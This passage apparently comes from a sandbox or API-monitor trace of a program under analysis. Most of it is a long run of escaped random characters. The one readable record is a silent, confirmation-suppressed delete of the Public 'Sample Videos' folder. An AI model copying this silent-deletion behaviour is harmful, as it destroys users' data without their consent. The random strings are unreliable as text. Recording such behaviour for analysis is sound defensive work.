bf\x5083\x809b\x2ebe\xf5a0\xe831\x1c07\xd9fa\x39bf\xfff4\xf404\x18d5\x9eb4\x1b43\xf405\x125\x175d\x6e83\xd0e0\x8bf\x73e8\x7a02\xc5f\x5bfa\x7d0e\x4054\x129f\x9bd0\xd062\xe0a\x2c5d\xcfa0\x6808\xc56\x98ba\xb43\xf405\x171\x1fed\xce83\xd0e6\x231\x54a\x5bf4\x146f\x813a\x743\x6808\x80a5\x17be\x5e83\xa1ce\x6f5d\xe870\x16a\x8ead\x741\x6872\x1bdb\xfa3c\x2f25\x1d17\x8e1e\x644c\x2ed0\xe871\x9166\x10d7\x5779\xf2c4\x517e\xd08e\xdfe7\xaf88\xcef7\x7418\x873f\x12ae\x47d0\x3404\x62f\x877d\xe743\x680a\x80b9\x888e\x5f41\xd0e5\xbd09\xb5ea\xa0c5\x704f\x5ba8\x5740\xe80a\xf967\x71b1\xd0e6\x104\x407d\x1b40\xd063\x393b\xfd94\x438b\x16ef\xbfd0\xa0c4\x1c85\x43ba\xa740\xe80b\x31a3\xf5e8\xfa1c\x809a\x4fa\x7174\xea0c\xd0e6\x4c7\x9274\x1680\xa0c6\x397d\x58b4\x5540\x1d01\x8313\x9776\x7421\x809a\xb66\x80e8\xf418\xe13\x46bd\xaf40\xd010\x9ae\xe851\xe4e\x281d\xc3a0\xb405\x62d\x937d\xbb43\xc9ff\x6ba3\xf027\x1df9\x9b12\x17df\xf439\x17d\xc3fd\x4e04\x4fb5\x7772\x889c\xccad\x351c\xa1f\xf98e\xb6\x42bd\x7710\x1b5e\x1279\xcf80\x81ec\xf703\x1745\xa183\x12ff\x47c5\xd812\x8830\xc32\xc297\x9a2f\x5202\x3761\x5728\xa822\xe14c\xc112\x6330\x36bc\x964f\xc0e4\x4d80\x63df\xda34\xc5ea\x7a9a\x8c6d\x69a7\xd4a1\x2ee0\xe960\xb7b\xad68\x71ea\xfde8\x5771\xc6a6\x8a49\x11b6\x7ba3\xc950\x9451\xe191\x5add\xa7e3\x5ade\x5d47\xfedc\x2e1a\xae82\xb85b\x58ee\xb47e\x1f90\xb51f\xa9bf\x446\xad7\x1e77\xd0c4\xec93\xd479\xbaaf\x5ba2\xbfda\x8dc1\x9b88\x6cac\x64f1\x5ede\x62a5\x2458\x8ee2\xbcc9\xa9c5\xf8c6\x16df\x1f71\x1b0f\xca00\x6c4d\x52b6\xc451\x65b7\x78ae\x9e1c\xd6ea\x7801\x27a2\xd764\x720f\x5055\x7a5\x2ed9\x6e82\x505b\xe57c\x3c16\x12b2\x8b1a\xa845\x58d5\x82c2\xd8e0\xe6a7\xefa3\x7bda\xda66\x7fe4\xc7a2\xead0\xa1cf\xc19a\xc050\x2822\x1e80\xddc4\x109b\x2ee1\x9565\x65a3\x67e1\x81d7\x39bb\xc826\xdd7b\x96e3\x62e4\x1b44\x67e1\xdf52\x5c82\xb9f3\x5007\xaa8a\x81f2\x6ee6\xf5ae\x4f64\xc937\xc6ec\x9c93\x91cd\xbe92\x5ae5\x3d9a\x20ef\x7816\xd510\x97f9\x926\x3608\xa34a\x9175\x1a58\x3d89\xce24\xbb18\xbd20\xed5a\x2174\xed96\xeb62\x20fc\x2c83\xf4da\xfa2d\xa41d\xfcad\x3087\x8407\x808\x2762\x587f\xdd3a\xeb0b\x2c28\x79c2\x92eb\x92ab\xe416\xeb66\x2a69\xd8b4\x4984\xb3ab\x8bf8\xc86a\x6ff8\xa2a1\x4f92\x2d70\xcbca\x7aab\x9dc3\xb30d\x8ac1\x7771\xc43c\xe4d7\x2819\xb746\xb468\xcf86\x99a2\xea36\x621f\x8eb\xd67\xf9a5\x7bb1\x3484\xf38f\xd20a\x483c\x8bf1\xdd40\xcd2c\xa889\x779a\xf5d5\xd548\x4bc\x1af6\x73b4\xd9e7\xcf91\x2f9c\xcd72\x22f9\x8fef\x148f\xb751\x9461\x8fd8\xfda1\x9f85\x1f44\x8b10\x3ae\xc602\xc3a3\x335\x238\x9dc7\x3833\x8ac9\xd2e2\xb129\xc174\x361c\x3fb9\x7417\x204f\xa22d\x1f0b\xcd09\xa276\x9b7f\x75c4\x78cf\x31c3\x6faf\x5c68\x7539\x2213\x38e5\x6585\x942b\x57e6\x4e65\xdb2f\xa1bc\xec9\x99a4\xccab\x56d\x5ad6\x3241\x9457\xb1c\xc7a9\xee8c\x4b7e\xaa13\xa153\xbaf8\x5af2\x2a2f\xa8ee\x1b68\xfb27\xcaaa\x5ac4\x2824\x7a95\xd9b7\xde50\x8ad1\x71d4\x143e\xf68b\xd66a\x555a\x98d9\xc037\x6ca7\x9d9c\xf500\xfba5\x35ad\xcabe\xfac3\xb445\x4530\xecf3\x492d\xc4a2\xdd61\x79a1\x94f6\x55f4\x6b71\x26b9\xe7c3\x2e69\x24f9\xf7bb\x815\x76f1\xd477\x2e15\x1bfc\xc6ca\xec2d\xae1a\xe824\x4823\x11e6\x183c\x3103\x506b\x4219\x355f\xe79a\x65ae\x4fc3\x1ab4\xb2ed\x6b70\x65e8\xa747\x9bb5\x6e0a\x4a03\x75ca\x56e8\xcce\x38c8\x6d62\xaecc\xcf29\xabc5\x254\x9b29\x2d93\x9d08\xae9a\x593c\xcbd3\x131f\xc4a5\x2161\x864\xd934\x7b4c\x75e5\xf694\xb1d0\xa8b4\x8481\x38e6\xa860\x4a92\x7bfe\x5d56\x3fc2\xcf74\x647c\xcb9f\x8f5f\x5bb8\xad9a\x8961\x10a1\x9eb6\xcdcf\x271c\x41df\xe56c\x1b17\x134\xf78\x2f80\xaf9\x77a4\x3f91\x7a94\x5380\xf64c\x7ceb\xa45b\xbe62\xee7c\x1e1e\xa254\x4af3\x4606\x412a\x4df\x4434\x1545\x4b0b\x5f9c\xaa6f\x3e7f\xadea\xf534\x2c56\x1cca\xc9f5\xc26b\x2d77\x1735\xc1c3\xebd4\xc3c5\x1e23\xe6e3\xcb8b\x7019\xa21c\xb22c\xc4c7\x4596\xf90f\x8fb2\x2f79\xcfbe\x30bd\x4db\x6825\x766e\xdd17\x7c63\x5161\xb62a\x7e23\x617c\xefd1\xafc1\xfc02\x6d9a\x617c\xa7d5\x5f1b\xf4d8\x8d2b\x122f\x81f4\xee6\x2c7d\xe3bb\xd307\x188c\x875c\x371c\x70cd\xb01e\x4dbb\x70f3\x538c\x9ff\xe8f\x39ca\xd8cf\x4537\xdfd4\x11e1\xe5e\xdfe1\xf08b\x1833\xc45e\x29c6\x33c2\x950e\xa346\xecd1\xc458\x5e77\xbfd7\x39c8\xeda\xc8ad\xb89e\x925f\x6f72\xe9b5\x7017\x79af\x1260\xedb5\x6236\x46dd\x8d3c\xac25\xb057\x8ed4\x2cc9\xbf80\x7a1\x51d\x86f4\xbb0\xbb2a\x5458\x436\x5b1e\xf6f9\xf406\x4cd3\xebfb\x915f\x75f3\xdfb\xe653\x3d3e\x5d\xa829\x334\x6a49\x66e8\xfb2b\x7bef\xec40\xa695\xee\x3d2d\x3a15\x5eb6\xcb7d\x7d9\xe446\xf274\x6cd2\xf955\x7c3\x57a5\xf468\x686f\xc3a4\x9cc3\xc419\x13f8\x3be\x11d8\x4698\x6ed7\x4ac0\xeebc\xd85\xedfc\x8d1\x9720\x4ea6\x7da\x7e3c\x9a0f\xa86b\x46fd\xb778\x7a36\xacf6\x9cbc\xed14\x7ae0\x5ad5\x61de\x5e63\x43a3\xb732\x6705\xa240\x81d4\x2890\xfbc\xdb97\xff6f\xaa82\x261\x934\xa93d\xf97e\x69b5\x9962\xf4a9\xac69\x3682\xe6ab\xb0c1\x3f9d\x89a0\x23ca\x397\x61c6\x1533\x463\x69bc\xde41\xc854\x54a0\x47f6\x60b7\x5b68\xb790\xc3ad\x7dca\xe2ba\xef3c\xe2b2\x772c\x3e80\x45a9\x1b11\x319d\xb83e\x750c\x1e2\x609b\x4dc6\xaf76\xed0d\xa5f2\xc4cb\x42d6\xf0b6\x8e7e\x73e1\x9abd\xa12e\x4cab\x1ae5\x8c44\xbc5c\x3fb\x31cf\xf5d3\x7c35\xf70b\xa002\x6a97\x36fe\x41c5\x693c\x1bf\x52c5\x481f\xd0cb\x5412\xff69\x3406\x8093\xcd83\x9123\x6163\xdbf6\x4250\xcdca\xa077\x73ff\x93be\xf156\xa964\x313b\x1f59\x8a36\xc59f\x8dc5\x29ba\x5a4e\xa08e\x2d57\x8181\xa346\xc825\xf503\xe9f9\x3872\x7151\xbe5a\x5651\xa4cb\xae97\x2793\xa936\xd95d\x197b\x4432\x9463\x1eff\xc719\x4ce8\x7fa0\xfd83\x7bfa\xc744\xb4cc\x30ed\xe1ee\xe334\xff4\x181\xf60d\xb191\x3fe8\x3442\xb6d\x320f\x7f4e\xe81f\xe68f\x571e\xdd83\x811e\xd9d2\x32b6\xd1d0\x3d25\x1d05\xb227\x978c\x25b0\xf03f\xf3ca\xd4e6\xd8fd\xf1d\x5ba1\x9d3\xfe3d\xccb6\xbf71\x4bd9\x85df\xb586\xe78c\x1b63\x955a\x8242\x6d13\xb824\x5d6\x6dbc\xee13\x28a2\x6b1b\x7c16\x57f3\xa7e4\xc237\x64e8\x599e\x1b67\x55e\x647a\x5a1d\xbe43\xa121\x6c7\x3143\xb19b\xeb35\xb96c\xccfc\x3115\x77\xbce0\x9026\xf19d\x56be\xd7a1\x65dc\xf6c2\x2657\x7f6c\x39a5\xdb51\x315f\xb4f7\x493f\x36fd\xdeae\x699b\xfe1b\x492c\x245b\x9aee\x54ac\x158c\xd59b\x5da8\xc957\xf6b8\x7ad7\x4aea\x5bbe\x75e7\xaacf\xbaf7\x5d8b\x6598\x7856\x1784\x9ef\xde51\xc6c\x7aa7\x4b9a\xd2fb\x7ada\x4a6f\xcbb1\x4904\x71af\x97c9\xd8c4\x5966\xa967\x9a8\x4fbc\xd927\x4db8\xf711\x8be4\x96c5\x657c\x85b1\xdfdb\xbe22\xc2f9\x36b8\xe348\xc7c6\x93c\x1032\xcfa\xe8e\x2adf\xf90f\xb98a\xcc0a\xcbb7\x45b1\x5a5e\xdd97\x2fc4\xd9a2\xffef\x2c91\xc595\x7250\x5cef\x356a\x5dee\x3245\xe73e\x4e47\x2be6\x42d6\x62a1\x757e\x2c03\x4f1b\xa361\xe848\xc1e6\x665a\x974b\xd645\xca93\x38fa\x75d5\xc75e\xe1e7\x2ed4\x458b\x9677\x71f5\xb041\xe7cf\xe555\x4a38\xc4e1\x72fa\x13b1\x3dc7\x2cb1\x6cc4\x340e\x6f85\xf904\x4a02\x86f0\xbc26\x86a0\x5cf2\xf746\xa5e0\x280e\x3426\x15c1\x514e\xd431\x4a17\x4d09\x3f68\xcab\xad10\x8460\x95f7\x1034\x2a1a\x988e\x9d3c\x428d\x2a48\x998b\xcf3c\x43f2\x98e3\xfec6\x87dc\x6ecb\xb534\x340a\x4aed\x4f4e\x59c8\x91ab\x2538\x3edc\x167e\x3389\xdf7c\x54a6\xbb2e\xe51f\xa886\x417\xe2c1\x78f8\x3586\xd200\x13e9\x8fb8\xa75c\x1c99\x818\xc962\xe393\xc990\x2ca2\x69e7\xedd4\x92ac\x5f71\xdfc7\x7623\x1f06\x79e1\x7da9\xf3d\xdd79\x9d59\x70a6\x1187\xfc35\x98ee\x57f0\x8475\xb8a6\xf3d8\xe2ad\x217e\xc700\xb7f6\x7b63\x3d44\xf277\x5644\x93af\xd1aa\xb262\x7e36\xb37c\xa593\x6673\xfbf6\xbe6a\xc257\x7e06\x9a6f\xda5e\xc9e9\x29b7\x8715\x7f71\x320\xce65\xb947\xb241\xdb2d\xf2e4\x237f\xb6a7\xa2b5\xcd7d\x5ba1\x306c\x2b0d\x6dd0\x5d05\xd056\x573\x565d\x75d0\x5d05\xd056\x575\x565d\x75d0\x5d05\xd056\x575\x565d\x75d0\x9d45\xb7eb\x4236\x3154\x7544\x59e2\x2049\x8db7\xbbd\x3422\xcf0f\xb93f\x1e82\x7810\x1054\xefe3\x1195\xbba3\xe051\xe34e\x78ed\x5aac\x96ac\x23c4\x9d4b\x9f66\xbf40\x9448\xb3df\x861b\xcc74\x78e7\x1135\x5def\x69a7\x5aed\xf38b\x5166\xed2a\x6e32\xbc96\x45e5\xa52d\xad12\xef61\xa0e0\xf142\xbeb3\x8980\xf9a3\xd036\xef77\x2590\xef9a\xda08\xdca7\x9381\x2064\x83d2\x3228\xa315\x820f\x505e\x8af5\xe269\x637a\xb29c\x4caf\xd583\xd948\x9de8\xb292\xd40\x9056\x200d\x987e\xc2db\xd09f\x883\x3f2f\xdc85\xe569\x9005\x9d64\x7077\x84fa\xaaa\xef39\x9e49\x63e0\x4ef4\x372f\x3311\xe57\x4524\xeb2d\x62a\x723\x14c2\x4f85\x8a41\xf086\xb047\xaf02\x2f1f\xb04b\x77be\xb52a\xd9b2\xbd88\x5d4b\x3105\x77a2\x3e33\xdec3\xbb0d\x3c7f\xdd76\xcd0a\x247f\xe20c\xa644\x6dd1\x2e06\x2181\x7b19\x263d\x48fc\x3ee7\x191a\x9690\xfa7d\x546d\x8f2\xb3db\xa261\x554d\x5cb8\x1dc4\xc202\xd873\xc5b3\x569a\x9117\xee7f\xbb73\xfce2\x2130\xfdad\xd9d7\xfe11\xddc6\xdfdd\x4767\xa24e\x8882\x12d3\xc548\x6eca\x653e\x1d9a\xb5e\xcc4e\x23a8\x3130\x4bf4\xab75\xe4d8\x9edb\xa39b\xa054\x9b2b\xfd6a\xc40a\x2cdf\x7e3\xc97b\xd0d1\xe923\x5816\x3d7b\xca0d\x9c5a\x6554\x8b63\x5699\x8afc\x9160\x5936\x4658\x685d\x2d15\x448d\x38a\x53da\x71d2\x4eb\x9787\x7fbd\xf01d\xe5a1\xedc0\x85ff\xe4f3\x85cd\x5591\xfed6\x6229\xbd54\x2f24\x7747\xa25f\xe6e7\x94e5\x7ac8\xf2b6\xc3e6\x7032\x8b54\xd3d7\x74b0\xee18\x900e\x7e50\x13a\x3db9\x5bb3\xa50d\x58dc\xb0e6\xadf9\xfe0d\x96cc\x77c0\x6fc8\x72f2\x4c6\x6980\xfe5\x74d9\xdd06\x1c5e\x288e\x4e90\x95b1\xbc77\x2b02\x4829\x1d76\xdd36\x7465\x82a4\xddde\xdba4\xad09\x8f0f\x3180\xdd5a\xa304\x183c\xc1ef\x17c2\x64c0\x1dfb\x92f8\x2f08\x135a\x12e2\x2947\x706f\x23b9\xd6c\x3a96\x6848\x8a79\xb1b2\x2f9e\xb054\x754a\x7560\x63b9\xb8bf\x964d\xca94\xa33f\x383f\x78c8\x9edf\xeddd\xaf4f\xac05\xb77d\xf800\x53ae\x5d0b\x7288\xbde4\xe730\xe36f\x8015\xdafe\x6d4f\xd605\x3f66\xa3dd\x5ce6\xe7ad\xbef1\x8f5f\xc6fd\xc4c5\xa9eb\xea59\x85f6\x650a\xa055\xe967\x7520\x825d\xdacf\x3aa0\x43bc\x31d2\xcf81\x107a\x2cd2\x8f69\x410e\xdf8d\x75a8\x5814\xf84f\xbf33\xbc0a\x306\xcd8d\xff2e\x778a\xb47f\x95f1\x1f4d\x7c6a\xaa95\x9aa7\x12d\xf9e8\xdc58\xc29e\x8f9e\x1bd5\xcf45\x16c7\x8a35\x8f9e\xd69d\xab88\xe1c0\x3cc8\x5f41\xa652\xc684\xdc8d\x562c\xaf67\x8dd2\x9b07\x7e43\x3f8b\x60f3\x2be0\xa444\xbba7\x6771\x9c57\x2e1\x5d66\xdb4\xb599\x39d8\xcf85\x1222\x35dd\xce15\xe7b6\xab8\x21d\xbb3d\xe97d\x8e0a\xa07b\x1068\x77c5\x812\xf5e8\xf95b\xa709\x8b80\xfead\x34d2\x56c5\x745\x71be\xcab3\x4d57\xecc8\xab52\x9120\x1b46\xdb70\xfed3\x4c72\xbed4\xd73c\x1ee\x800e\x4fae\xeccd\x6fc1\xd4f0\x9e81\xfe1a\x5b2b\x1c77\xb09\x2c37\xead8\x2bd8\x4262\x367f\x5205\x5fb1\x22c6\xbaa3\xbc59\xd22f\xeff9\xfaaf\x941a\x59e1\x3c56\xd529\x3514\x54bd\x12f5\x73f2\x4173\x9e7\xe1ad\x21f2\xf8c8\xd928\x8d1f\x4186\xb7ac\xdc01\xa7ea\xf1e8\x54aa\xc4dc\x166d\xa3aa\x8b00\xd151\x6248\xdb74\xa903\xd05a\x80ef\xf415\x8efb\x112c\xb25\x6265\xaf04\xafe7\xf2af\xebe5\x5c5f\x7e0e\x6c8\xf082\xb8d7\x96ab\x6bc5\x8437\xbde0\xa9cd\x3505\x374b\x3f29\xd585\xf8ae\x3cbc\x31f7\xaa49\x5ba1\x5050\x280e\x60d\xd3e\x9a14\x825f\xf2af\xf5dc\x8c00\x9746\xf463\x1e3a\x38fd\xa746\x6888\x32dc\x2f0e\xcf29\x75fd\x5c5c\xc625\x53dd\x1b9e\x8b8a\x3143\x7c39\x7953\xafee\xe2e2\x62d6\xf5dc\xb9e5\xc44f\x61c5\xe10d\xca4b\xff73\xe96d\xb89\x5c61\xf2ff\x37dc\x2e30\xc449\x863d\xc02b\x37af\x4f44\xa8dc\x6b66\xf790\x9c22\x8384\x204\xc41c\x2090\x931f\xb68e\x233\xcf2d\x1923\xa356\x8403\x31a7\x4890\x3b1b\x3cdc\xe819\x3804\xa303\x2165\xf40b\x26e0\xe7f5\xf6a0\x676b\xb68f\xca23\x214d\xb422\x844a\x8b66\xb150\x2d08\xa114\x447b\x58a8\x6684\xd088\x1132\xc89a\xb443\xa22c\xdb54\x58d9\xf111\xb8a2\xe2cd\x77ba\x5a39\xfc40\x8830\x9adf\x162a\xf9fc\x729f\x8549\x490a\x4505\xc811\x217a\xa42e\x2083\x37cf\x71d9\x4a02\xfb02\x11cf\x1d5c\x985b\xbfeb\x2c40\xd91c\x112f\xb7d9\x9c70\x3d03\x132b\x128d\x1eb9\x69ac\x177c\x7e30\x87d\xf294\x783\x80f\xeb76\x8d7d\x411b\xc0fd\xab14\x2573\xbd69\x6128\x973f\x9a2d\xd559\xa111\x4554\x2289\x17a6\xd4d1\xaea7\x2585\xa4f0\x8fa9\x8140\x2fa7\xf7b\xa76a\x65a9\xcad7\xe0fc\x5ed6\xc9f6\x457f\x4f09\xf0b\xd8b4\xcbe\x2c1b\xcf45\xe0e1\xaabe\x593\xa21a\x30d7\x9a42\x1b1e\x9987\xc1f6\x30f3\xa916\x4257\xb489\x2d9b\xc5e5\x5cf1\x6093\xe075\x7aa7\xd258\x68e1\x3ea4\xa686\x78da\xaddd\xa16c\x39a8\x9c72\x4ae7\xe4ae\x3cd4\x648f\xc531\x661\xe1ad\xf644\x8fcf\x300\xe30e\x95d2\x3bf1\xace9\x957b\x9e76\x5feb\xb219\x5e3f\xfdc7\x7175\x8cce\x9dbb\x8352\x217a\xd877\x8ae3\x7719\xc3d8\xe0b\x417\xe7cb\xc371\xf968\x392f\xb517\x194f\x4283\x3962\x449f\x25e3\x6d14\x2125\xae26\x98fd\x8fcf\x421\x48a0\xdde4\x469f\xefa7\x1c17\x8c1c\x5f4e\xd800\xfd9a\xebc6\x2cb1\x4783\x8a51\xe60f\x2ebd\x5d36\x3ea3\xd315\xd674\x4ed9\x5df6\x703d\x57b9\xe13e\xf10c\x124e\xed4a\x1a03\xfb2f\x1216\xed07\x5def\xf323\x193\xf893\xa50\xc85f\x87cd\xe362\x4599\xdf53\x46b8\x678c\x7ffa\xfe78\xc48b\x7bb5\xe11f\x32dd\xc569\xc5cf\x53c6\x7598\x5912\xa89f\x2cf6\x33fc\x668f\xd4d0\x6b92\x8a04\xb0a4\xa1e7\x234e\x6ef5\x7308\xb62f\x468e\x224\x6348\x4da6\x9e7c\x412b\x9178\xfda6\xd32f\x5d61\xaa7d\xd696\xfb0a\x31a3\x59ea\x9088\xf97a\x4556\xe6e5\xaeb9\xe588\xfca7\xd0a8\xe7c4\xc9b9\x64a6\xc4ec\x2868\xfd7a\xd9d6\x4848\xbd07\x7a1\xf11a\xde7c\x6dc7\xb1d8\xae46\xf90f\xffb2\x5883\x9834\xd284\xf892\xee68\xff64\x1cbc\x7246\xb23d\x17d8\x3c84\x3579\xebd4\x5e0d\xd171\x602f\xec04\xb252\xdce0\xbb9\x2560\x9296\xd188\xf4c7\xef06\x294e\x3bbb\x6ca7\x9a9d\x5ee3\xa55d\xe6\x3724\x929\xb62\x55bd\x6b77\xfd78\x6e10\xc2c9\xb1b4\xb269\x7e14\x550b\x5049\xad32\x6830\xbc0b\xafb9\x9fb8\xb6e0\x9f7\x9d9c\xb857\x159f\x8917\x152a\x7357\x7b1b\xdb1\xe1ef\x21ca\x5945\x6b7e\xae17\x793c\x56ea\x7abc\x9bd7\xe39b\xb455\x2d9c\xeedc\x5303\xcded\xbf1d\x816a\xad2c\x252c\x6b68\xc5df\x387e\xd3d8\x6e47\xf561\xf1d2\x4077\xf082\x5234\xfb4\xe344\xa03b\xfe29\xada0\x2bd5\x315f\x171\xee1a\xad6d\x7d3d\xecbb\xbedc\xbf9d\xe14f\xb306\x5c2e\xd2a6\xbdef\x8b78\x16a0\x22ba\x8a01\x3d55\xcae6\x84a5\x25f6\xd521\x6042\x5ab9\x5532\x4aed\xf590\xf029\x8ed\x9924\xbf69\x2dfc\x90b7\x407a\xc69c\x5b43\xddb5\xe376\xe1e3\xd164\xd9a1\xeb7e\xefed\x914a\x9ae3\x2409\x568\xa779\x1f2a\xae84\xce29\x2398\x9bc1\xc40\x7e66\xd98a\x7280\xdfb9\x17ac\x6383\x73d4\x2289\x5c2f\x6d11\x5f8a\x7adc\x9864\x2556\xf784\x9207\x13a2\xd164\xb347\x7589\xbcd8\x72a9\xeb4\x82b\xa2b7\x4e85\x9de5\x877c\x99b2\x4225\xfc7d\x5c10\xbe7d\x3ca3\x8934\x549f\x6a33\xabbf\x82ee\x2ab2\xc54d\x68db\xdda6\x1bfe\xa971\xa00\xc6a5\x7949\x44c9\xb87e\xe9ff\xf0df\xe53e\x416a\x5d90\x8c6b\x4b6e\xfa0\x6916\xe634\x5385\x6e8c\x206b\x8449\x671c\xe7f7\x76b3\x9fde\xc5f0\xd491\xd700\x8f50\x3fb2\x4335\xd058\x6ef1\x4e8a\x706f\x85d9\xcba2\x971d\x7a41\xd981\x1e37\x85c1\xd50b\x1ae2\xb52e\x1cf\xb895\x334\xe354\x2ac\x945a\x7313\x3b55\x2f8f\x905\xbf8d\x50b3\xde96\xe3c9\x3f08\xd51c\xebdd\xc848\xd9c0\xf0f\x9633\x48a7\x127a\xd236\xeb4c\x67c\x2413\xa312\x766e\x3914\x4ada\xe140\xd851\xe42a\xc60d\x12a5\xcb3f\xee6c\x540e\x239f\xc530\x65d9\xa351\xc635\x988f\x668f\x3b36\xe47b\x9e28\x1db0\xc1ff\xe8d4\x11de\x4e8a\xeb07\xbbed\x7501\x3780\x78cf\x9f96\x3fc5\xb680\xe0cd\xf7f8\xf8f2\x1045\xbdba\x23cc\xac05\x1e84\xdf41\x822b\x8c46\xb13c\x2183\xb22e\xb174\x3e72\xb8c9\x6fc2\xc532\x70df\x39e2\x7a5e\x292b\xd0d2\xf32b\x59a4\x137a\xd09\x4e38\x7b3c\x7c4a\x9620\x3bb1\x440e\x595d\xb1f4\xc85a\xd9d6\xae53\xbab8\x9450\xc99a\x2cbd\x4fd1\xfc7b\xd0e5\x3c12\xea96\xc3ca\xe653\x2b61\xe07a\x31e2\x121f\xc5d5\xaaee\xe9fb\x6473\xa2fc\x2b0\x1b3c\xadd7\x971a\xe248\x4f2a\x7235\xa84a\xaf72\xa89e\x2d05\x187e\xecce\x6563\x119e\x7e81\x35d9\xc795\xdef2\x811c\x3017\x7598\x8594\x53af\x4cd\xbd5c\xd713\xab59\x8912\xa0d9\x99bc\x808d\xecdd\xdf4\xf51c\x9ffa\x705\xf720\xae7b\x163c\x7bf8\xd95e\x9719\x9e\x7ddf\x7f02\x34c0\xea7d\x9927\xd852\xcc4a\xece6\x182e\xa558\x7d02\xcb4e\x2e3c\xe61c\x13e\x643b\x1f0d\xf1e7\xc2f5\xac76\xfa27\x3783\xdb62\xd354\x8ee6\xaa18\x98c2\xaccc\xf32d\xaedc\x6177\xc783\xec56\xc08\xecab\xa902\x943b\x972f\x8ce5\x6280\x5b68\x1938\xa927\xbb2\x417a\xf73b\x8474\x669d\xd613\x509f\x789f\x343b\x5a11\x120c\xd1fe\xd675\x1a8a\xab5d\xaec\xc638\x74b9\xb8ef\x7a3e\x8c1e\x35c6\x3bca\xcc8d\x8375\x5890\xa086\xbf04\xcd0e\xbc80\x906b\xd22f\x70c9\x4012\x2012\xa21e\xffb0\x5d66\x1dc7\xb77c\xd785\x8921\x1db4\x2183\x7b0a\xf361\xc603\x1762\xe67e\xdb88\x64f9\x407d\xbbe0\x11ef\x5c08\x81df\x33a8\xf4ac\x1906\x741d\xdc40\x10b9\x8ad7\xc37f\x8ca8\xaf1b\x605b\x61e4\x5c5d\x2efc\x31a4\x88eb\xdb5\x177b\x2cf8\x4934\xd7e6\x909e\x46a2\xcf76\x815e\x417a\x1b3b\x882f\x2b7c\xe714\xe286\xcc60\x42f5\x7ecc\x6415\xf32f\xf8c\xcb15\x95fa\xe8a4\xa8cb\x2e3f\x14bb\x6b3\x5df9\x7702\xd3f0\x713\xf0\x3f45\x567e\x303c\x138f\x5163\x543d\xd48a\x11b2\x6d0a\x2f19\xaaae\x4168\x376c\x6d46\xcf1d\xa27d\x952e\xec1a\xdd4f\xb31d\x9f70\xd5c7\x770f\xa661\x6240\xb4f6\x78c8\x6603\x48ec\x5ee3\x677d\xfab9\xd85d\xf516\xbd4b\xeddd\x1c8a\xc569\xa59b\x8c07\xfdc4\xf9a0\x12e9\x32d9\xe5e6\x5723\x6fc\x5f0f\xea79\xf02\x5090\xba41\xb699\x49f6\x90ec\x1d2f\xa58f\x699a\xa059\xd047\x721a\xbe35\x7bcf\xef92\xbb01\x61a2\xc20d\xe7d4\xb522\xc0ed\xab7\x249c\xde1b\x7db3\xacf0\x528d\xa43a\x91f\xec81\x5a9e\xe288\x85ad\x7de1\x847c\xe3b8\xa082\x6a3b\xbed0\x846e\xcf0\xa3b8\xc7ee\xc3fc\xccf3\xefb4\xcd7e\xbeef\xac16\x7a21\x4195\xac1b\x59d3\x5578\x9d50\xde05\x3b2\xb15d\xa3b7\x162\x6cca\xb8d3\xe78f\xd39e\x851a\xf161\xa686\xd9c8\x5e4d\xd57e\xd881\x9df6\x4f8\x3dce\x37e3\xc281\x1e3c\xc6e1\xd440\x7556\x9795\xb3c0\x3663\xceae\x3766\xcdf1\xe117\x9d44\x4fc\xdd9f\xf464\x4c0f\x8fdc\xf7\x7176\xb3ef\xbfe9\xda16\x326b\xf90f\x1d7e\xcb9d\xb8c2\x8913\x6978\xbf1f\xe075\xee4e\xbc2f\xab0\x17af\x4104\x3cab\xbb97\xcf80\x1e30\xb74a\x6e05\xaaa2\xaeb\xb3c\xcb06\x52d6\x5095\x6f15\xd071\xe441\xb428\x2101\xc60e\x614b\xd4e8\xbc1c\x86fc\x33fa\xbdcc\xc3eb\xd8c3\x5461\xba29\x2724\xc91e\x6153\x7525\xe960\x8409\x66ca\x33a1\x9b2\x73d8\xeeee\x66a2\xf864\xcf76\xf3a6\x87dd\x6a37\x3893\x34cb\x120a\xbef5\x2663\x5379\x39dc\x4a4\xc700\x21ce\x37f9\xef9d\x521c\x4e6c\xfe3\x1724\xf46a\xf72d\x7c8b\xec7d\xe8d0\x5d7\x1db4\x3faf\x4505\x20a3\xa676\xbb34\x8f0e\x3fb2\xdeea\xa7c0\xdfa\xabf7\x66e2\x2a0\x51e8\x7e5f\xb3e8\x2915\x21e8\x5ea0\x8596\x49ca\x4dd1\x1a29\xac7a\xaed7\xd47b\x86dd\x91fc\xaf6e\xcbe2\xa3c6\xa16e\x81a0\x49ae") | out: lpFileOp=0x8bf870*(hwnd=0x0, wFunc=0x3, pFrom="C:\\Users\\Public\\Videos\\Sample Videos", pTo=0x0, fFlags=0x614, fAnyOperationsAborted=0, hNameMappings=0x0, lpszProgressTitle="\x7df2\x3dce\xc953\x484b\xd76e\xe3ef\x12ec\xf625\xe82c\x52a5\x67f1\x1d01\xa1c1\x7217\x3768\xe797\xfa35\xb619\x4322\xe113\x621c\xe57c\x2e40\xac0e\x4cf3\x12c9\x9f9c\xf6cf\xea42\xc4dc\x2580\x29fc\xddc6\xa843\xa662\xda1d\xf9cb\xc236\xf1eb\x9835\xee68\xf283\xbc77\xe588\x25bf\x1080\x27fe\xbf0f\x17b6\x29ad\x69f\x9aec\x5ba7\xa4df\x4fd1\xf3b1\xd9c0\xc1be\x5667\xe6ac\x8b48\xcfc2\xb600\xdf1d\xb1cf\x76d\xd83c\x33b0\x11c\x14bf\x4751\x2a30\xa209\xfbd6\xc340\xc455\xd518\xf8c3\x3042\x4970\x3d83\x8579\x1a18\x7801\x1d\xdd2a\x52c5\x9b4f\x3c26\xb4cd\xbdac\x3088\x4530\x84c5\xce6b\xf6c6\xce3c\xefbb\x6f50\xf3e7\xc885\xb7bb\x4ee3\x3f28\x4742\xe8c0\x850f\xc415\x4dba\x8e6e\x17df\x7be0\x9653\x8860\x639f\x6801\xb053\x624f\x7b42\x7d9b\xf696\x9b36\x953d\xd5cc\x81a9\x413c\x55da\x7bb3\x53a9\xd665\x5b38\x74c3\x1961\x336c\xc94e\x9581\xe56c\x9cb5\x1310\x6bb3\xae3a\x4643\x34d6\x8456\x559\xc200\xec1d\x81c1\x9ac8\xdbaf\x97c3\x9ca9\x8017\x3702\xc0de\xefdf\xe5b\x8bef\xee78\x1287\x7f59\xdd4c\xcccc\xc5c\x1b2f\xfece\x8e39\xcbf\x4584\x1f67\xa8c\x9894\xda6c\x86af\x1d2c\x713b\x8ac4\x5d20\x4778\xdee5\x34c0\x1f6a\xb10a\x3d80\x3d8f\xfc0c\x6cdd\xda0c\x2193\x9b9c\xec76\xdc61\x62f